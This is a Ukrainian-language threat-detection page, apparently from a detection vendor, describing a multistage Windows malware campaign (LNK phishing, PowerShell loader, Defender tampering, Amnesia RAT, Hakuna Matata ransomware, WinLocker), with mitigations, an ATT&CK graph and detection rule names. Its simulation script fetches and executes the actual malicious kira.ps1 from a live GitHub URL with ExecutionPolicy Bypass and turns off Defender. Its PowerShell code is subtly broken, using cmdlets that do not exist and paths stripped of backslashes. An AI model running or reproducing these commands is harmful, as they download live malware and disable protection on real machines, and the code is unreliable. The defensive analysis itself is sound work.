Всередині багатоступеневої операції з Windows-шкідливим програмним забезпеченням
Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
FortiGuard Labs виявили багатоступеневий ланцюг вторгнення в Windows, який починається з шкідливого файлу LNK, що доставляється в стиснутому архіві. Ярлик запускає початкову PowerShell завантажувач, який витягує наступні скрипти з GitHub, а потім передає управління обфускованому оркестратору VBScript. Процес намагається ослабити захист кінцевої точки, вимикаючи Microsoft Defender, розгортаючи утиліту Defendnot і інсценуючи як Amnesia RAT, так і програму-здирник Hakuna Matata. Операція завершується скиданням компонента WinLocker, який блокує робочий стіл, щоб перешкодити відновленню та чинити тиск на жертв.
Розслідування
Слідчі відновили шлях виконання із PowerShell етапу, запущеного з LNK, до VBScript, який відновлює корисні навантаження в пам’яті, призводячи до розгортання програмного забезпечення-здирника і поведінки блокування робочого столу. Захисні заходи були обійдені через цільові редагування реєстру та ін’єкцією Defendnot DLL в Taskmgr.exe. Постійність була реалізована за допомогою комбінації записів Run key і артефактів папки Автозавантаження для повторного запуску ланцюга після входу.
Пом’якшення
Моніторте підозрілі зміни реєстру на рівні політики в розділах HKLMSOFTWAREPoliciesMicrosoftWindows Defender та HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Заблокуйте вихід до відомих шкідливих URL GitHub та Dropbox, що використовуються для інсценування, та попереджуйте про шаблони завантаження та виконання PowerShell, що походять з запусків LNK. Забезпечте білий список додатків і посиліть контроль виконання PowerShell для зменшення початкового доступу на основі скриптів.
Реакція
Якщо виявлено, ізолюйте кінцеву точку, відновіть налаштування реєстру, що стосуються Defender, до відомого доброго стану, і видаліть шкідливі файли і записи постійності. Проводьте пошук активних процесів Amnesia RAT і пов’язаної мережевої активності, і валідуйте, чи відбулося виконання програмного забезпечення-здирника. Проведіть повну судово-медичну експертизу, щоб оцінити вплив і усунути залишки, потім відновіть системи з чистих резервних копій, де це можливо.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff6666 %% Node definitions step_a[“<b>Дія</b> – <b>T1566.001 Фішинг: Вкладення</b><br/>Файл LNK «Задание_для_бухгалтера_02отдела.txt.lnk» усередині стисненого архіву”] class step_a action step_b[“<b>Дія</b> – <b>T1059.001 PowerShell</b><br/>Файл LNK запускає PowerShell з параметром -ExecutionPolicy Bypass для завантаження скрипту «kira.ps1»”] class step_b action step_c[“<b>Дія</b> – <b>T1027 Обфусковані файли або інформація</b><br/>VBScript «SCRRC4ryuk.vbe» закодований за допомогою Script Encoder Plus, Base64 та RC4”] class step_c action step_d[“<b>Дія</b> – <b>T1562.001 Порушення захисних механізмів</b><br/>PowerShell вимикає захист у реальному часі Microsoft Defender та додає широкі виключення файлової системи”] class step_d action step_e[“<b>Дія</b> – <b>T1218.010 Проксі-виконання через Regsvr32</b><br/>DLL Defendnot та завантажувач розгортаються і інжектуються у довірений процес Taskmgr.exe”] class step_e action step_f[“<b>Дія</b> – <b>T1548.002 Обхід контролю облікових записів користувачів</b><br/>Використовується цикл ShellExecute runas для отримання підвищених привілеїв”] class step_f action step_g[“<b>Дія</b> – <b>T1547.001 Ключі Run реєстру / Папка автозапуску</b><br/>Створює запис у HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run та копіює «svchost.scr» у %PROGRAMDATA% і папку автозапуску користувача”] class step_g action step_h[“<b>Дія</b> – <b>T1082 Виявлення інформації про систему</b><br/>Збирає інформацію про операційну систему, апаратне забезпечення, домен та IP-адресу через WMI”] class step_h action step_i[“<b>Дія</b> – <b>T1057 Виявлення процесів</b><br/>Перелічує запущені процеси для уникнення повторного виконання”] class step_i action step_j[“<b>Дія</b> – <b>T1113 Захоплення екрана</b><br/>«TelegramWorker.scr» робить знімки екрана (1.png–30.png) та надсилає їх через Telegram”] class step_j action step_k[“<b>Дія</b> – <b>T1555 Облікові дані зі сховищ паролів</b><br/>Витягує паролі та cookie з браузерів Chromium за допомогою DPAPI”] class step_k action step_l[“<b>Дія</b> – <b>T1539 Викрадення cookie веб-сесій</b><br/>Збирає cookie та токени з браузерів”] class step_l action step_m[“<b>Дія</b> – <b>T1550.004 Використання альтернативних матеріалів автентифікації</b><br/>Перехоплює файли сесій Telegram Desktop з каталогу «tdata»”] class step_m action step_n[“<b>Дія</b> – <b>T1102.002 Веб-сервіс</b><br/>Надсилає зібрані дані та знімки екрана зловмиснику через Telegram Bot API”] class step_n action step_o[“<b>Шкідливе програмне забезпечення</b> – <b>T1486 Шифрування даних з метою впливу</b><br/>Вимагач Hakuna Matata «WmiPrvSE.scr» шифрує файли з розширенням @NeverMind12F”] class step_o malware step_p[“<b>Дія</b> – <b>T1490 Блокування відновлення системи</b><br/>Виконує «reagentc /disable», «wbadmin delete catalog», «vssadmin delete shadows /all»”] class step_p action step_q[“<b>Шкідливе програмне забезпечення</b> – <b>T1499 Відмова в обслуговуванні на кінцевій точці</b><br/>WinLocker «gedion.scr» створює мʼютекс WINLOCK… та блокує робочий стіл”] class step_q malware %% Connections step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|leads_to| step_f step_f –>|leads_to| step_g step_g –>|leads_to| step_h step_h –>|leads_to| step_i step_i –>|leads_to| step_j step_j –>|leads_to| step_k step_k –>|leads_to| step_l step_l –>|leads_to| step_m step_m –>|leads_to| step_n step_n –>|leads_to| step_o step_o –>|leads_to| step_p step_p –>|leads_to| step_q
Потік атаки
Виявлення
Підозрілий процес використовує URL в командному рядку (через cmdline)
Перегляд
Вимкнути моніторинг реального часу Windows Defender та інші зміни параметрів (через cmdline)
Перегляд
IOCs (HashSha256) для виявлення: Всередині багатоступенева кампанія зловмисного ПО для Windows
Перегляд
Шкідлива мережна активність та C2 через GitHub, Dropbox, Telegram [З’єднання мережі Windows]
Перегляд
Кампанія зловмисного ПО для Windows Виконання PowerShell [Windows Powershell]
Перегляд
Виконання PowerShell і CMD з відволіканням Install.exe [Створення процесу Windows]
Перегляд
Виконання симуляції
Передумови: Перевірка телеметрії та базова попередня перевірка має бути пройдена.
Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив повинні безпосередньо відображати визначені TTPs та націлені на генерацію тієї самої телеметрії, яку очікує логіка виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Атака & Команди:
Противник, який отримав початкове закріплення на кінцевій точці, бажає завантажити та виконати шкідливий PowerShell корисний навантажувач, уникаючи політики виконання за замовчуванням. Вони використовуютьInvoke‑Expression(iex) у поєднанні зInvoke‑WebRequest(irm) для витягування скрипту з віддаленого GitHub raw URL, запускаючи його під-ExecutionPolicy Bypass. Після встановлення постійності вони відключають моніторинг реального часу Windows Defender, щоб уникнути виявлення наступних корисних навантажень. Ці кроки безпосередньо генерують командні рядки, за якими спостерігає правило Sigma. -
Сценарій регресійного тестування:
# -------------------------------------------------------------- # Крок 1 – Виконати віддалений скрипт з ExecutionPolicy Bypass # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Крок 2 – Вимкнути моніторинг реального часу Windows Defender # -------------------------------------------------------------- # Вимкнути захист у реальному часі Disable-MpPreference -DisableRealtimeMonitoring $true # Додати шлях для виключення (симульовано) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
Команди очищення:
# Повторно увімкнути моніторинг реального часу Windows Defender Enable-MpPreference -DisableRealtimeMonitoring $false # Видалити шлях для виключення (якщо існує) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # Зупинити будь-які залишкові PowerShell процеси, запущені скриптом Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force